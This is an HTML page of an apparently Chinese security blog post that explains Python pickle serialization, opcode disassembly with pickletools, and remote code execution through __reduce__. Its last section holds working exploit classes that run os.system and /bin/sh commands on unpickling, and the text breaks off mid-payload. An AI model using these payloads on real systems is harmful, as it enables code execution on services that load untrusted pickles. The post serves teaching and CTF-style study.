

<!DOCTYPE html>
<html lang="en" data-default-color-scheme=auto>



<head>
  <meta charset="UTF-8">

  <link rel="apple-touch-icon" sizes="76x76" href="/img/fluid.png">
  <link rel="icon" href="/img/fluid.png">
  

  <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=5.0, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#2f4154">
  <meta name="author" content="John Doe">
  <meta name="keywords" content="">
  
    <meta name="description" content="整合1-2-4-5-6 pickle库解析 这是Python的标准库，用于序列化和反序列化Python对象 在python中序列化是将Python对象转换为字节串（以字符串形式存在）的过程 字符串是二进制的形式 这里的字节串其实就是opcode（操作码）   读取和序列化储存的文件的后缀为.pkl，不能直接打开预览  方法与属性与协议   特点 序列化 反序列化 作用    针对文件 pickle">
<meta property="og:type" content="article">
<meta property="og:title" content="pickle反序列化-1">
<meta property="og:url" content="http://example.com/2025/10/28/pickle%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96-1/index.html">
<meta property="og:site_name" content="Hexo">
<meta property="og:description" content="整合1-2-4-5-6 pickle库解析 这是Python的标准库，用于序列化和反序列化Python对象 在python中序列化是将Python对象转换为字节串（以字符串形式存在）的过程 字符串是二进制的形式 这里的字节串其实就是opcode（操作码）   读取和序列化储存的文件的后缀为.pkl，不能直接打开预览  方法与属性与协议   特点 序列化 反序列化 作用    针对文件 pickle">
<meta property="og:locale" content="en_US">
<meta property="article:published_time" content="2025-10-28T14:16:40.000Z">
<meta property="article:modified_time" content="2025-10-28T14:22:59.251Z">
<meta property="article:author" content="John Doe">
<meta property="article:tag" content="反序列化">
<meta property="article:tag" content="HMAC">
<meta property="article:tag" content="python">
<meta name="twitter:card" content="summary_large_image">
  
  
  
  <title>pickle反序列化-1 - Hexo</title>

  <link  rel="stylesheet" href="https://lib.baomitu.com/twitter-bootstrap/4.6.1/css/bootstrap.min.css" />



  <link  rel="stylesheet" href="https://lib.baomitu.com/github-markdown-css/4.0.0/github-markdown.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/hint.css/2.7.0/hint.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.css" />



<!-- 主题依赖的图标库，不要自行修改 -->
<!-- Do not modify the link that theme dependent icons -->

<link rel="stylesheet" href="//at.alicdn.com/t/c/font_1749284_5i9bdhy70f8.css">



<link rel="stylesheet" href="//at.alicdn.com/t/c/font_1736178_k526ubmyhba.css">


<link  rel="stylesheet" href="/css/main.css" />


  <link id="highlight-css" rel="stylesheet" href="/css/highlight.css" />
  
    <link id="highlight-css-dark" rel="stylesheet" href="/css/highlight-dark.css" />
  




  <script id="fluid-configs">
    var Fluid = window.Fluid || {};
    Fluid.ctx = Object.assign({}, Fluid.ctx)
    var CONFIG = {"hostname":"example.com","root":"/","version":"1.9.8","typing":{"enable":true,"typeSpeed":70,"cursorChar":"_","loop":false,"scope":[]},"anchorjs":{"enable":true,"element":"h1,h2,h3,h4,h5,h6","placement":"left","visible":"hover","icon":""},"progressbar":{"enable":true,"height_px":3,"color":"#29d","options":{"showSpinner":false,"trickleSpeed":100}},"code_language":{"enable":true,"default":"TEXT"},"copy_btn":true,"image_caption":{"enable":true},"image_zoom":{"enable":true,"img_url_replace":["",""]},"toc":{"enable":true,"placement":"right","headingSelector":"h1,h2,h3,h4,h5,h6","collapseDepth":0},"lazyload":{"enable":true,"loading_img":"/img/loading.gif","onlypost":false,"offset_factor":2},"web_analytics":{"enable":false,"follow_dnt":true,"baidu":null,"google":{"measurement_id":null},"tencent":{"sid":null,"cid":null},"leancloud":{"app_id":null,"app_key":null,"server_url":null,"path":"window.location.pathname","ignore_local":false},"umami":{"src":null,"website_id":null,"domains":null,"start_time":"2024-01-01T00:00:00.000Z","token":null,"api_server":null}},"search_path":"/local-search.xml","include_content_in_search":true};

    if (CONFIG.web_analytics.follow_dnt) {
      var dntVal = navigator.doNotTrack || window.doNotTrack || navigator.msDoNotTrack;
      Fluid.ctx.dnt = dntVal && (dntVal.startsWith('1') || dntVal.startsWith('yes') || dntVal.startsWith('on'));
    }
  </script>
  <script  src="/js/utils.js" ></script>
  <script  src="/js/color-schema.js" ></script>
  


  
<meta name="generator" content="Hexo 7.3.0"></head>


<body>
  

  <header>
    

<div class="header-inner" style="height: 70vh;">
  <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand" href="/">
      <strong>Fluid</strong>
    </a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/" target="_self">
                <i class="iconfont icon-home-fill"></i>
                <span>Home</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/archives/" target="_self">
                <i class="iconfont icon-archive-fill"></i>
                <span>Archives</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/categories/" target="_self">
                <i class="iconfont icon-category-fill"></i>
                <span>Categories</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/tags/" target="_self">
                <i class="iconfont icon-tags-fill"></i>
                <span>Tags</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/about/" target="_self">
                <i class="iconfont icon-user-fill"></i>
                <span>About</span>
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" target="_self" href="javascript:;" data-toggle="modal" data-target="#modalSearch" aria-label="Search">
              <i class="iconfont icon-search"></i>
            </a>
          </li>
          
        
        
          <li class="nav-item" id="color-toggle-btn">
            <a class="nav-link" target="_self" href="javascript:;" aria-label="Color Toggle">
              <i class="iconfont icon-dark" id="color-toggle-icon"></i>
            </a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

  

<div id="banner" class="banner" parallax=true
     style="background: url('/img/default.png') no-repeat center center; background-size: cover;">
  <div class="full-bg-img">
    <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.3)">
      <div class="banner-text text-center fade-in-up">
        <div class="h2">
          
            <span id="subtitle" data-typed-text="pickle反序列化-1"></span>
          
        </div>

        
          
  <div class="mt-3">
    
    
      <span class="post-meta">
        <i class="iconfont icon-date-fill" aria-hidden="true"></i>
        <time datetime="2025-10-28 22:16" pubdate>
          October 28, 2025 pm
        </time>
      </span>
    
  </div>

  <div class="mt-1">
    
      <span class="post-meta mr-2">
        <i class="iconfont icon-chart"></i>
        
          3.4k words
        
      </span>
    

    
      <span class="post-meta mr-2">
        <i class="iconfont icon-clock-fill"></i>
        
        
        
          29 mins
        
      </span>
    

    
    
  </div>


        
      </div>

      
    </div>
  </div>
</div>

</div>

  </header>

  <main>
    
      

<div class="container-fluid nopadding-x">
  <div class="row nomargin-x">
    <div class="side-col d-none d-lg-block col-lg-2">
      

    </div>

    <div class="col-lg-8 nopadding-x-md">
      <div class="container nopadding-x-md" id="board-ctn">
        <div id="board">
          <article class="post-content mx-auto">
            <h1 id="seo-header">pickle反序列化-1</h1>
            
            
              <div class="markdown-body">
                
                <p>整合1-2-4-5-6</p>
<h3 id="pickle库解析"><a href="#pickle库解析" class="headerlink" title="pickle库解析"></a>pickle库解析</h3><ul>
<li>这是Python的<em><strong>标准库</strong></em>，用于<strong>序列化</strong>和<strong>反序列化</strong>Python对象</li>
<li>在python中序列化是将Python对象转换为<em><strong>字节串</strong></em>（以字符串形式存在）的过程<ul>
<li>字符串是二进制的形式</li>
<li>这里的字节串其实就是<em><strong>opcode</strong></em>（<em><strong>操作码</strong></em>）</li>
</ul>
</li>
<li>读取和序列化储存的文件的后缀为<code>.pkl</code>，不能直接打开预览</li>
</ul>
<h4 id="方法与属性与协议"><a href="#方法与属性与协议" class="headerlink" title="方法与属性与协议"></a>方法与属性与协议</h4><table>
<thead>
<tr>
<th>特点</th>
<th>序列化</th>
<th>反序列化</th>
<th>作用</th>
</tr>
</thead>
<tbody><tr>
<td>针对文件</td>
<td>pickle.dump(obj,file)</td>
<td>pickle.load(file)</td>
<td>将对象序列化写入文件或从文件读取并反序列化对象</td>
</tr>
<tr>
<td>针对字节串</td>
<td>pickle.dumps(obj)</td>
<td>pickle.loads(bytes)</td>
<td>字节串&lt;–&gt;对象</td>
</tr>
<tr>
<td>-</td>
<td>-</td>
<td><strong>在反序列化一个实例时会自动引入没有引入的库</strong></td>
<td></td>
</tr>
</tbody></table>
<table>
<thead>
<tr>
<th>属性</th>
<th>作用</th>
</tr>
</thead>
<tbody><tr>
<td>pickle.HIGHEST_PROTOCOL</td>
<td>可用的最高协议版本</td>
</tr>
<tr>
<td>pickle.DEFAULT_PROTOCOL</td>
<td>默认协议版本（通常为4）</td>
</tr>
</tbody></table>
<table>
<thead>
<tr>
<th>协议版本</th>
<th>作用</th>
</tr>
</thead>
<tbody><tr>
<td>0</td>
<td>人类可读的ASCII格式（兼容旧版），并且向后兼容早期版本的 Python</td>
</tr>
<tr>
<td>1</td>
<td>二进制格式（兼容旧版），与早期版本的python兼容</td>
</tr>
<tr>
<td>2</td>
<td>Python 2.3+ 优化支持类对象，为存储 <a target="_blank" rel="noopener" href="https://docs.python.org/zh-cn/3.7/glossary.html#term-new-style-class">new-style class</a> 提供了更高效的机制。欲了解有关第 2 版协议带来的改进，请参阅 <a target="_blank" rel="noopener" href="https://www.python.org/dev/peps/pep-0307">PEP 307</a></td>
</tr>
<tr>
<td>3</td>
<td>Python 3.0+ 默认协议（不支持Python 2），具有对 <a target="_blank" rel="noopener" href="https://docs.python.org/zh-cn/3.7/library/stdtypes.html#bytes">bytes</a> 对象的显式支持，且无法被 Python 2.x 打开</td>
</tr>
<tr>
<td>4</td>
<td>Python 3.4+ 支持更大对象和更多数据类型，包括一些针对数据格式的优化，参阅 <a target="_blank" rel="noopener" href="https://www.python.org/dev/peps/pep-3154">PEP 3154</a></td>
</tr>
<tr>
<td>5</td>
<td>Python 3.8+ 支持内存优化和数据共享</td>
</tr>
<tr>
<td>-1&#x2F;None</td>
<td>使用默认的最高协议版本</td>
</tr>
</tbody></table>
<ul>
<li>在所有版本的协议中，0号版本是<em><strong>人类最可读</strong></em>的</li>
<li>使用的协议版本越高，读取生成的 pickle 所需的 Python 版本就要越新</li>
<li>由于pickle协议通常是<em><strong>向前兼容</strong></em>的，所以<em><strong>v0版本的字符串</strong></em>可以<em><strong>直接交给</strong></em><code>pickle.loads()</code>而不用担心引发意外</li>
</ul>
<h4 id="打包class"><a href="#打包class" class="headerlink" title="打包class"></a>打包class</h4><ul>
<li>需要注意的是，对于自定义<code>class</code>，不是对成员变量赋初值的话这个变量是不会被打包的</li>
<li>需要用<code>__init__</code>构造方法转换<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">class</span> <span class="hljs-title class_">dairy</span>():<br>	date = <span class="hljs-number">20241004</span><br>	<span class="hljs-comment"># 这样的话date是不会被打包的</span><br><br><span class="hljs-keyword">class</span> <span class="hljs-title class_">dairy</span>():<br>	<span class="hljs-keyword">def</span> <span class="hljs-title function_">__init__</span>(<span class="hljs-params">self</span>):<br>		<span class="hljs-variable language_">self</span>.date = <span class="hljs-number">20241004</span><br>		<span class="hljs-comment"># 这样就能被打包了</span><br>d = dairy()<br><span class="hljs-built_in">print</span>(pickle.dumps(d))<br></code></pre></td></tr></table></figure></li>
</ul>
<h3 id="pickle反序列化函数利用过程解析"><a href="#pickle反序列化函数利用过程解析" class="headerlink" title="pickle反序列化函数利用过程解析"></a>pickle反序列化函数利用过程解析</h3><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-comment"># 进入pickle类看load和loads</span><br><span class="hljs-keyword">def</span> <span class="hljs-title function_">_load</span>(<span class="hljs-params">file, *, fix_imports=<span class="hljs-literal">True</span>, encoding=<span class="hljs-string">&quot;ASCII&quot;</span>, errors=<span class="hljs-string">&quot;strict&quot;</span>,</span><br><span class="hljs-params">          buffers=<span class="hljs-literal">None</span></span>):<br>    <span class="hljs-keyword">return</span> _Unpickler(file, fix_imports=fix_imports, buffers=buffers,<br>                     encoding=encoding, errors=errors).load()<br><br><span class="hljs-keyword">def</span> <span class="hljs-title function_">_loads</span>(<span class="hljs-params">s, /, *, fix_imports=<span class="hljs-literal">True</span>, encoding=<span class="hljs-string">&quot;ASCII&quot;</span>, errors=<span class="hljs-string">&quot;strict&quot;</span>,</span><br><span class="hljs-params">           buffers=<span class="hljs-literal">None</span></span>):<br>    <span class="hljs-keyword">if</span> <span class="hljs-built_in">isinstance</span>(s, <span class="hljs-built_in">str</span>):<br>        <span class="hljs-keyword">raise</span> TypeError(<span class="hljs-string">&quot;Can&#x27;t load pickle from unicode string&quot;</span>)<br>    file = io.BytesIO(s)<br>    <span class="hljs-keyword">return</span> _Unpickler(file, fix_imports=fix_imports, buffers=buffers,<br>                      encoding=encoding, errors=errors).load()<br></code></pre></td></tr></table></figure>
<ul>
<li>可以看出这两个函数其实没什么区别，都是把输入转化为<em><strong>文件流</strong></em>，传给<code>_Unpickler</code>类后调用该类的<code>load()</code>函数</li>
<li>研究该类的工具：<code>pickletools</code></li>
</ul>
<h4 id="pickletools库"><a href="#pickletools库" class="headerlink" title="pickletools库"></a>pickletools库</h4><ul>
<li><em><strong>pickletools</strong></em>是pythonn自带的<strong>pickle调试器</strong></li>
<li>能<em><strong>反汇编</strong></em>一个已经被打包的字符串</li>
<li>能<em><strong>优化</strong></em>一个<strong>已经被打包</strong>的字符串你</li>
<li>能返回一个迭代器来供程序使用</li>
<li>借用这个工具能方便的看清楚每条语句的作用，并检测手动构造的字符串<strong>是否合法</strong></li>
<li></li>
</ul>
<h5 id="反汇编功能"><a href="#反汇编功能" class="headerlink" title="反汇编功能"></a>反汇编功能</h5><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">import</span> pickle<br><span class="hljs-keyword">import</span> pickletools<br><span class="hljs-keyword">class</span> <span class="hljs-title class_">dairy</span>():<br>	<span class="hljs-keyword">def</span> <span class="hljs-title function_">__init__</span>(<span class="hljs-params">self</span>):<br>		<span class="hljs-variable language_">self</span>.date = <span class="hljs-number">114514</span><br>		<span class="hljs-variable language_">self</span>.text = <span class="hljs-string">&quot;无聊的一天&quot;</span><br>		<span class="hljs-variable language_">self</span>.todo = [<span class="hljs-string">&quot;分析pickle&quot;</span>,<span class="hljs-string">&quot;吃零食&quot;</span>]<br>x = dairy()<br>s = pickle.dumps(x)<br><span class="hljs-built_in">print</span>(s)<br>pickletools.dis(s)<br><span class="hljs-string">&#x27;&#x27;&#x27;</span><br><span class="hljs-string">b&#x27;\x80\x04\x95i\x00\x00\x00\x00\x00\x00\x00\x8c\x08__main__\x94\x8c\x05dairy\x94\x93\x94)\x81\x94&#125;\x94(\x8c\x04date\x94JR\xbf\x01\x00\x8c\x04text\x94\x8c\x0f\xe6\x97\xa0\xe8\x81\x8a\xe7\x9a\x84\xe4\xb8\x80\xe5\xa4\xa9\x94\x8c\x04todo\x94]\x94(\x8c\x0c\xe5\x88\x86\xe6\x9e\x90pickle\x94\x8c\t\xe5\x90\x83\xe9\x9b\xb6\xe9\xa3\x9f\x94eub.&#x27;</span><br><span class="hljs-string">    0: \x80 PROTO      4</span><br><span class="hljs-string">    2: \x95 FRAME      105</span><br><span class="hljs-string">   11: \x8c SHORT_BINUNICODE &#x27;__main__&#x27;</span><br><span class="hljs-string">   21: \x94 MEMOIZE    (as 0)</span><br><span class="hljs-string">   22: \x8c SHORT_BINUNICODE &#x27;dairy&#x27;</span><br><span class="hljs-string">   29: \x94 MEMOIZE    (as 1)</span><br><span class="hljs-string">   30: \x93 STACK_GLOBAL</span><br><span class="hljs-string">   31: \x94 MEMOIZE    (as 2)</span><br><span class="hljs-string">   32: )    EMPTY_TUPLE</span><br><span class="hljs-string">   33: \x81 NEWOBJ</span><br><span class="hljs-string">   34: \x94 MEMOIZE    (as 3)</span><br><span class="hljs-string">   35: &#125;    EMPTY_DICT</span><br><span class="hljs-string">   36: \x94 MEMOIZE    (as 4)</span><br><span class="hljs-string">   37: (    MARK</span><br><span class="hljs-string">   38: \x8c     SHORT_BINUNICODE &#x27;date&#x27;</span><br><span class="hljs-string">   44: \x94     MEMOIZE    (as 5)</span><br><span class="hljs-string">   45: J        BININT     114514</span><br><span class="hljs-string">   50: \x8c     SHORT_BINUNICODE &#x27;text&#x27;</span><br><span class="hljs-string">   56: \x94     MEMOIZE    (as 6)</span><br><span class="hljs-string">   57: \x8c     SHORT_BINUNICODE &#x27;无聊的一天&#x27;</span><br><span class="hljs-string">   74: \x94     MEMOIZE    (as 7)</span><br><span class="hljs-string">   75: \x8c     SHORT_BINUNICODE &#x27;todo&#x27;</span><br><span class="hljs-string">   81: \x94     MEMOIZE    (as 8)</span><br><span class="hljs-string">   82: ]        EMPTY_LIST</span><br><span class="hljs-string">   83: \x94     MEMOIZE    (as 9)</span><br><span class="hljs-string">   84: (        MARK</span><br><span class="hljs-string">   85: \x8c         SHORT_BINUNICODE &#x27;分析pickle&#x27;</span><br><span class="hljs-string">   99: \x94         MEMOIZE    (as 10)</span><br><span class="hljs-string">  100: \x8c         SHORT_BINUNICODE &#x27;吃零食&#x27;</span><br><span class="hljs-string">  111: \x94         MEMOIZE    (as 11)</span><br><span class="hljs-string">  112: e            APPENDS    (MARK at 84)</span><br><span class="hljs-string">  113: u        SETITEMS   (MARK at 37)</span><br><span class="hljs-string">  114: b    BUILD</span><br><span class="hljs-string">  115: .    STOP</span><br><span class="hljs-string">highest protocol among opcodes = 4</span><br><span class="hljs-string">&#x27;&#x27;&#x27;</span><br></code></pre></td></tr></table></figure>
<ul>
<li>解析序列化后的字符串，并说明这个字符串都干了什么</li>
<li><em><strong>每一行都是一条指令</strong></em></li>
</ul>
<h5 id="优化功能"><a href="#优化功能" class="headerlink" title="优化功能"></a>优化功能</h5><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">import</span> pickle<br><span class="hljs-keyword">import</span> pickletools<br><span class="hljs-keyword">class</span> <span class="hljs-title class_">dairy</span>():<br>	<span class="hljs-keyword">def</span> <span class="hljs-title function_">__init__</span>(<span class="hljs-params">self</span>):<br>		<span class="hljs-variable language_">self</span>.date = <span class="hljs-number">114514</span><br>		<span class="hljs-variable language_">self</span>.text = <span class="hljs-string">&quot;无聊的一天&quot;</span><br>		<span class="hljs-variable language_">self</span>.todo = [<span class="hljs-string">&quot;分析pickle&quot;</span>,<span class="hljs-string">&quot;吃零食&quot;</span>]<br>x = dairy()<br>s = pickle.dumps(x)<br>s = pickletools.optimize(s)<br><span class="hljs-built_in">print</span>(s)<br>pickletools.dis(s)<br><span class="hljs-string">&#x27;&#x27;&#x27;</span><br><span class="hljs-string">b&#x27;\x80\x04\x95]\x00\x00\x00\x00\x00\x00\x00\x8c\x08__main__\x8c\x05dairy\x93)\x81&#125;(\x8c\x04dateJR\xbf\x01\x00\x8c\x04text\x8c\x0f\xe6\x97\xa0\xe8\x81\x8a\xe7\x9a\x84\xe4\xb8\x80\xe5\xa4\xa9\x8c\x04todo](\x8c\x0c\xe5\x88\x86\xe6\x9e\x90pickle\x8c\t\xe5\x90\x83\xe9\x9b\xb6\xe9\xa3\x9feub.&#x27;</span><br><span class="hljs-string">    0: \x80 PROTO      4</span><br><span class="hljs-string">    2: \x95 FRAME      93</span><br><span class="hljs-string">   11: \x8c SHORT_BINUNICODE &#x27;__main__&#x27;</span><br><span class="hljs-string">   21: \x8c SHORT_BINUNICODE &#x27;dairy&#x27;</span><br><span class="hljs-string">   28: \x93 STACK_GLOBAL</span><br><span class="hljs-string">   29: )    EMPTY_TUPLE</span><br><span class="hljs-string">   30: \x81 NEWOBJ</span><br><span class="hljs-string">   31: &#125;    EMPTY_DICT</span><br><span class="hljs-string">   32: (    MARK</span><br><span class="hljs-string">   33: \x8c     SHORT_BINUNICODE &#x27;date&#x27;</span><br><span class="hljs-string">   39: J        BININT     114514</span><br><span class="hljs-string">   44: \x8c     SHORT_BINUNICODE &#x27;text&#x27;</span><br><span class="hljs-string">   50: \x8c     SHORT_BINUNICODE &#x27;无聊的一天&#x27;</span><br><span class="hljs-string">   67: \x8c     SHORT_BINUNICODE &#x27;todo&#x27;</span><br><span class="hljs-string">   73: ]        EMPTY_LIST</span><br><span class="hljs-string">   74: (        MARK</span><br><span class="hljs-string">   75: \x8c         SHORT_BINUNICODE &#x27;分析pickle&#x27;</span><br><span class="hljs-string">   89: \x8c         SHORT_BINUNICODE &#x27;吃零食&#x27;</span><br><span class="hljs-string">  100: e            APPENDS    (MARK at 74)</span><br><span class="hljs-string">  101: u        SETITEMS   (MARK at 32)</span><br><span class="hljs-string">  102: b    BUILD</span><br><span class="hljs-string">  103: .    STOP</span><br><span class="hljs-string">highest protocol among opcodes = 4</span><br><span class="hljs-string">&#x27;&#x27;&#x27;</span><br></code></pre></td></tr></table></figure>

<h3 id="魔术方法-reduce-的RCE利用"><a href="#魔术方法-reduce-的RCE利用" class="headerlink" title="魔术方法__reduce__的RCE利用"></a>魔术方法__reduce__的RCE利用</h3><ul>
<li>是对象序列化机制的一个组成部分，效果和<strong>PHP</strong>的<code>__wakeup</code>差不多，都是在<em><strong>反序列化的时候会自动进行调用</strong></em></li>
<li>关键：pickle不是简单的数据转换，它会记录对象重建所需的代码逻辑（如调用类的<code>__reduce__</code>方法）</li>
<li>而与PHP不同的是，<code>__reduce__</code>这个魔术方法是可以人为控制的<ul>
<li>当使用pickle模块对对象进行序列化&#x2F;反序列化时，如果对象定义了<code>__reduce__</code>方法，pickle就会调用这个方法来获取序列化&#x2F;反序列化所需的信息</li>
</ul>
</li>
<li><strong>通常由对象自己定义</strong>，用于指定如何将对象转换为可序列化的形式，即定义对象如何被<em><strong>序列化或反序列化</strong></em></li>
<li><em><strong>值得注意的是</strong></em>：<code>__reduce__</code>的执行是在<code>__init__</code>之后的</li>
<li><em><strong>该函数返回一个元组</strong></em>：<ul>
<li>第一个元素是<em><strong>可调用对象</strong></em>（如函数、类等）</li>
<li>第二个元素是<em><strong>调用该可调用对象的参数</strong></em>（<strong>元组</strong>形式）</li>
<li>后续元素<strong>可选</strong>，如用于<code>__setstate__</code>的状态</li>
</ul>
</li>
<li>相比于其它的魔法方法，<code>__reduce__</code>不需要依赖<strong>对象本身的逻辑</strong>，只需要构造<code>__reduce__</code>返回的元组即可<ul>
<li>并且只需要反序列化数据中存在<code>__reduce__</code>即可，源代码中存在与否并不重要<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">import</span> pickle<br> <br><span class="hljs-keyword">class</span> <span class="hljs-title class_">tmp</span>():<br>	text = <span class="hljs-string">&quot;456&quot;</span><br> <br>	<span class="hljs-keyword">def</span> <span class="hljs-title function_">__init__</span>(<span class="hljs-params">self, text</span>):<br>		<span class="hljs-variable language_">self</span>.text = text<br> <br>	<span class="hljs-keyword">def</span> <span class="hljs-title function_">__reduce__</span>(<span class="hljs-params">self</span>):<br>		<span class="hljs-keyword">return</span> (tmp,(<span class="hljs-string">&quot;123&quot;</span>,))<br> <br>text = tmp(<span class="hljs-string">&#x27;aa&#x27;</span>)<br>sertext = pickle.dumps(text)<br> <br>reltext = pickle.loads(sertext)<br><span class="hljs-built_in">print</span>(reltext.text)<br><span class="hljs-comment"># 此处输出123，可以发现text被覆盖了</span><br><span class="hljs-comment">## 删去__reduce__就会恢复正常</span><br></code></pre></td></tr></table></figure></li>
</ul>
</li>
</ul>
<h4 id="执行系统命令"><a href="#执行系统命令" class="headerlink" title="执行系统命令"></a>执行系统命令</h4><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">import</span> pickle<br><span class="hljs-keyword">import</span> os<br><span class="hljs-keyword">class</span> <span class="hljs-title class_">exploit</span>:<br>	<span class="hljs-keyword">def</span> <span class="hljs-title function_">__reduce__</span>(<span class="hljs-params">self</span>):<br>		<span class="hljs-keyword">return</span> (os.system,(<span class="hljs-string">&#x27;calc&#x27;</span>,))<br>		<span class="hljs-comment"># 反序列化时执行 os.system(&#x27;calc&#x27;)（Windows 弹出计算器）</span><br>	<span class="hljs-comment"># 该函数返回一个元组</span><br>	<span class="hljs-comment">## 元组第一个元素：可调用的对象（如函数、类）</span><br>	<span class="hljs-comment">## 元组第二个元素：调用该对象时的参数，用一个元组包含</span><br>	<span class="hljs-comment">### 为什么要()：表示是元组类型</span><br>	<span class="hljs-comment">### 为什么要,(逗号)：单元素元组也要在元素后逗号，否则python不会将其识别为元组</span><br>data = pickle.dumps(exploit())<br>pickle.loads(data)  <span class="hljs-comment"># 此处会弹出计算器！</span><br><br><span class="hljs-comment"># payload</span><br><span class="hljs-keyword">import</span> subprocess  <br><span class="hljs-keyword">import</span> pickle  <br><span class="hljs-keyword">class</span> <span class="hljs-title class_">Exploit</span>:  <br>	<span class="hljs-keyword">def</span> <span class="hljs-title function_">__reduce__</span>(<span class="hljs-params">self</span>):  <br>		<span class="hljs-keyword">return</span> (subprocess.Popen, ([<span class="hljs-string">&#x27;/bin/sh&#x27;</span>,<span class="hljs-string">&#x27;-c&#x27;</span>,<span class="hljs-string">&#x27;id&#x27;</span>],))  <br>payload = pickle.dumps(Exploit())  <br>pickle.loads(payload)<br><br><span class="hljs-keyword">import</span> pickle, os  <br><span class="hljs-keyword">class</span> <span class="hljs-title class_">Exploit</span>:  <br>	<span class="hljs-keyword">def</span> <span class="hljs-title function_">__reduce__</span>(<span class="hljs-params">self</span>):  <br>		<span 